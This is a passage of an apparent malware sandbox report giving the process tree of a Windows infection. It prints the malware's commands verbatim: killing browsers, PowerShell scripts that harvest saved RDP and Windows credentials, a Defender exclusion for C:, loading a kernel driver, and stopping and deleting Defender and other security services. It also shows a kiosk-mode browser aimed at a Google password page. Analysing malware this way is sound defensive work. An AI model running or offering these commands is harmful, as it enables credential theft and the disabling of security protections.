      Kills process with taskkill
      PID:2256
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM torch.exe
      4⤵
      Kills process with taskkill
      PID:2672
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM whale.exe
      4⤵
      Kills process with taskkill
      PID:5356
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM 360browser.exe
      4⤵
      Kills process with taskkill
      PID:5660
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM qqbrowser.exe
      4⤵
      Kills process with taskkill
      PID:4032
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM browser.exe
      4⤵
      PID:6092
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3152
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      PID:4672
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      PID:6324
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM brave.exe
      4⤵
      PID:6384
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM opera.exe
      4⤵
      Kills process with taskkill
      PID:2956
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM vivaldi.exe
      4⤵
      Kills process with taskkill
      PID:2712
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM firefox.exe
      4⤵
      Kills process with taskkill
      PID:6116
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM dragon.exe
      4⤵
      Kills process with taskkill
      PID:6412
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM maxthon.exe
      4⤵
      Kills process with taskkill
      PID:6504
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM uc_browser.exe
      4⤵
      Kills process with taskkill
      PID:5312
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM slimjet.exe
      4⤵
      PID:2280
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM cent_browser.exe
      4⤵
      Kills process with taskkill
      PID:6744
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM epic.exe
      4⤵
      PID:4920
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM torch.exe
      4⤵
      Kills process with taskkill
      PID:6724
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM whale.exe
      4⤵
      Kills process with taskkill
      PID:7084
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM 360browser.exe
      4⤵
      Kills process with taskkill
      PID:6964
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM qqbrowser.exe
      4⤵
      Kills process with taskkill
      PID:6684
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM browser.exe
      4⤵
      Kills process with taskkill
      PID:7004
  - - C:\Windows\system32\vaultcmd.exe
      "vaultcmd" /list
      4⤵
      PID:4472
  - - C:\Windows\system32\cmdkey.exe
      "cmdkey" /list
      4⤵
      PID:6592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5552
    - - C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        5⤵
        
        PID:3848
  - - C:\Windows\system32\certutil.exe
      "certutil" -store My
      4⤵
      PID:5740
  - - C:\Windows\system32\certutil.exe
      "certutil" -store -user My
      4⤵
      PID:4388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
      4⤵
      Command and Scripting Interpreter: PowerShell
      Hide Artifacts: Ignore Process Interrupts
      PID:5204
  - - C:\Windows\system32\cmdkey.exe
      "cmdkey" /list
      4⤵
      PID:5152
  - - C:\Windows\system32\cmdkey.exe
      "cmdkey" /list:TERMSRV/69.48.201.74
      4⤵
      PID:1172
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
      4⤵
      PID:3264
  - - C:\Windows\system32\hostname.exe
      "hostname"
      4⤵
      PID:2748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1100
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
      4⤵
      PID:3140
  - - C:\Windows\system32\netsh.exe
      "netsh" advfirewall show allprofiles state
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:6452
- - C:\Users\Admin\AppData\Local\Temp\10416710101\275ebaba42.exe
    "C:\Users\Admin\AppData\Local\Temp\10416710101\275ebaba42.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2316
- - C:\Users\Admin\AppData\Local\Temp\10416720101\ac5ed4bbfd.exe
    "C:\Users\Admin\AppData\Local\Temp\10416720101\ac5ed4bbfd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4008
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10416720101\ac5ed4bbfd.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2344
- - C:\Users\Admin\AppData\Local\Temp\10416730101\43b13e599f.exe
    "C:\Users\Admin\AppData\Local\Temp\10416730101\43b13e599f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4008
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10416730101\43b13e599f.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5168
- - C:\Users\Admin\AppData\Local\Temp\10416740101\7381290483.exe
    "C:\Users\Admin\AppData\Local\Temp\10416740101\7381290483.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5340
- - C:\Users\Admin\AppData\Local\Temp\10416750101\68ab528098.exe
    "C:\Users\Admin\AppData\Local\Temp\10416750101\68ab528098.exe"
    3⤵
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5744
  - - C:\Users\Admin\AppData\Local\IeGkDOqzXwi9.exe
      "C:\Users\Admin\AppData\Local\IeGkDOqzXwi9.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4928
  - - C:\Users\Admin\AppData\Local\5JJTKUd3aM0z.exe
      "C:\Users\Admin\AppData\Local\5JJTKUd3aM0z.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:2392
- - C:\Users\Admin\AppData\Local\Temp\10416760101\b57d7fa1b5.exe
    "C:\Users\Admin\AppData\Local\Temp\10416760101\b57d7fa1b5.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5696
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5644
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:4180
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      PID:5932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5116
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5872
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5892
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {ce1c9167-6786-464f-b109-4266d565b8f7} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:5144
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2412 -initialChannelId {23a94d39-5c8f-4d31-8fa6-12728afdd4a6} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        Checks processor information in registry
        
        PID:5152
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3832 -prefsLen 25213 -prefMapHandle 3836 -prefMapSize 270279 -jsInitHandle 3840 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3848 -initialChannelId {aaa1eeb1-c547-43a6-91fc-c3ac3c2ffb29} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        Checks processor information in registry
        
        PID:4012
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3976 -prefsLen 27325 -prefMapHandle 3980 -prefMapSize 270279 -ipcHandle 4132 -initialChannelId {7447f60f-9df6-450e-8230-b568366b7142} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:2800
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4396 -prefsLen 34824 -prefMapHandle 4400 -prefMapSize 270279 -jsInitHandle 4404 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2864 -initialChannelId {e4690764-8331-408c-89dc-6ea179d758b3} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        Checks processor information in registry
        
        PID:3964
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 3212 -prefsLen 35012 -prefMapHandle 3024 -prefMapSize 270279 -ipcHandle 2668 -initialChannelId {07dca08e-bb61-4f37-9414-986d11f5d7c3} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        Checks processor information in registry
        
        PID:6736
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5148 -prefsLen 32952 -prefMapHandle 5152 -prefMapSize 270279 -jsInitHandle 5156 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5164 -initialChannelId {2affe936-3af3-42ee-b9a0-c4411a00efec} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        Checks processor information in registry
        
        PID:6792
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5224 -prefsLen 32952 -prefMapHandle 5228 -prefMapSize 270279 -jsInitHandle 5232 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5240 -initialChannelId {2ecc7508-7804-4197-b866-44faa22dd836} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        Checks processor information in registry
        
        PID:6800
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32952 -prefMapHandle 5576 -prefMapSize 270279 -jsInitHandle 5580 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5588 -initialChannelId {047e6be9-0b96-4a5c-a708-a720f1b9f4bc} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        Checks processor information in registry
        
        PID:6828
- - C:\Users\Admin\AppData\Local\Temp\10416770101\b43c992318.exe
    "C:\Users\Admin\AppData\Local\Temp\10416770101\b43c992318.exe"
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - Modifies Windows Defender Real-time Protection settings
    - Modifies Windows Defender TamperProtection settings
    - Modifies Windows Defender notification settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:5348
- - C:\Users\Admin\AppData\Local\Temp\10416780101\9a3f4a2326.exe
    "C:\Users\Admin\AppData\Local\Temp\10416780101\9a3f4a2326.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1232
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5356
- - C:\Users\Admin\AppData\Local\Temp\10416790101\136d7a97c3.exe
    "C:\Users\Admin\AppData\Local\Temp\10416790101\136d7a97c3.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6276
- - C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe
    "C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3192
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4484
- - C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3760
- - C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:1448
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:2968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6432
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:6188
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:1624
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:5164
- - C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe
    "C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6628
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5304
- - C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5992
  - - C:\Users\Admin\AppData\Local\Temp\261.exe
      "C:\Users\Admin\AppData\Local\Temp\261.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5488
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6603.tmp\6604.tmp\6605.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        5⤵
        
        PID:2916
      - C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5740
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\67A9.tmp\67AA.tmp\67AB.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        7⤵
        Drops file in Program Files directory
        
        PID:6636
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:6932
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:5676
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:6736
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:4612
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5784
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3748
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:7124
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:5288
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:1292
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:6076
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5308
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:7032
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:3164
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:5940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:3136
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:5228
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:5352
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:4160
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5648
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5432
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:4112
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:3224
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:4720
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:4832
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:2604
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:3708
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:2348
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:1172
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:3512
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:5128
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:660
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:1716
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:2304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:5472
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:4456
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:2684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:5136
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:3264
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:6620
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:3144
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:2748
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:2484
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:5212
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:3852
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:5752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:6892
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:6920
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:4956
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:1424
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:4928
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:5332
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:6108
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:5728
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:2256
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:3464
        
        C:\Windows\system32\schtasks.exe
        
